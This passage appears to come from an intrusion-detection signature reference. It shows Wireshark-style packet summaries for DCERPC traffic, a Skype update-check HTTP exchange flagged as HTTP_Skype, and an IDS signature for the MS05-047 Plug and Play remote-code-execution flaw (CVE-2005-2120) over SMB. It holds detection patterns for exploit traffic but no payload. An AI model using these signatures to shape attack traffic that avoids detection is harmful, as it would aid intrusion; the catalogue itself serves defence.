Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 2193 (2193), Dst Port: 1025 (1025), Seq: 1, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
223 2005-12-12 09:20:37.450308 211.91.125.137 192.168.37.180 DCERPC Bind: call_id: 1 UUID: 906b0ce0-c70b-1067-b317-00dd010662da ver 1.0

Frame 223 (126 bytes on wire, 126 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 2193 (2193), Dst Port: 1025 (1025), Seq: 1, Ack: 1, Len: 72
DCE RPC

No. Time Source Destination Protocol Info
224 2005-12-12 09:20:37.452475 192.168.37.180 211.91.125.137 DCERPC Bind_ack: call_id: 1 accept max_xmit: 5840 max_recv: 5840

Frame 224 (114 bytes on wire, 114 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 2193 (2193), Seq: 1, Ack: 73, Len: 60
DCE RPC

No. Time Source Destination Protocol Info
225 2005-12-12 09:20:37.706247 211.91.125.137 192.168.37.180 DCERPC Request: call_id: 1[Unreassembled Packet]

Frame 225 (1078 bytes on wire, 1078 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 2193 (2193), Dst Port: 1025 (1025), Seq: 73, Ack: 61, Len: 1024
[Unreassembled Packet: DCERPC]
Data (1024 bytes)





■Signature description

http://xforce.iss.net/xforce/xfdb/16252



■References
PestPatrol Web site
Skype
http://www.pestpatrol.com/pestinfo/s/skype.asp


■Detected event


HTTP_Skype


■Packet (Skype 2.0 BETA)

GET /ui/0/1.4.0.84/ja/getlatestversion?ver=1.4.0.84&uhash=163e57355f5b77fd72808174b0cd58d4e HTTP/1.1

User-Agent: Skype. 1.4

Host: ui.skype.com

Cache-Control: no-cache

Cookie: SC=LC=ja:CCY=:CC=:TZ=:VER=0/1.4.0.84/:TS=1135438814:TM=1135438685

HTTP/1.1 200 OK

Date: Sat, 24 Dec 2005 15:42:47 GMT

Server: Apache

Last-Modified: Tue, 25 Oct 2005 23:05:25 GMT

ETag: "1b0109-9-2ccb3740"

Accept-Ranges: bytes

Content-Length: 9

Connection: close

Content-Type: text/plain; charset=utf-8

Content-Language: en

1.4.0.79



■Signature description

http://www.iss.net/security_center/static/22481.php



■References
Microsoft Security Bulletin MS05-047
Vulnerability in Plug and Play Could Allow Remote Code Execution and Local Elevation of Privilege (905749)
http://www.microsoft.com/technet/security/bulletin/ms05-047.mspx

CVE
CVE-2005-2120
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2120



■IDS detection


MSRPC_PlugAndPlay_DeviceSlashBo


■Packet

No. Time Source Destination Protocol Info
5236 2005-12-24 06:58:04.253249 192.168.221.110 192.168.221.180 DCERPC Request: call_id: 1[Short Frame]

Frame 5236 (1514 bytes on wire, 1514 bytes captured)
Ethernet II, Src: 00:10:5a:64:fa:71, Dst: 00:d0:c9:96:61:5c
Internet Protocol, Src Addr: 192.168.221.110 (192.168.221.110), Dst Addr: 192.168.221.180 (192.168.221.180)
Transmission Control Protocol, Src Port: 1031 (1031), Dst Port: microsoft-ds (445), Seq: 586, Ack: 448, Len: 1448
NetBIOS Session Service
SMB (Server Message Block Protocol)
SMB Pipe Protocol
[Short Frame: DCERPC]


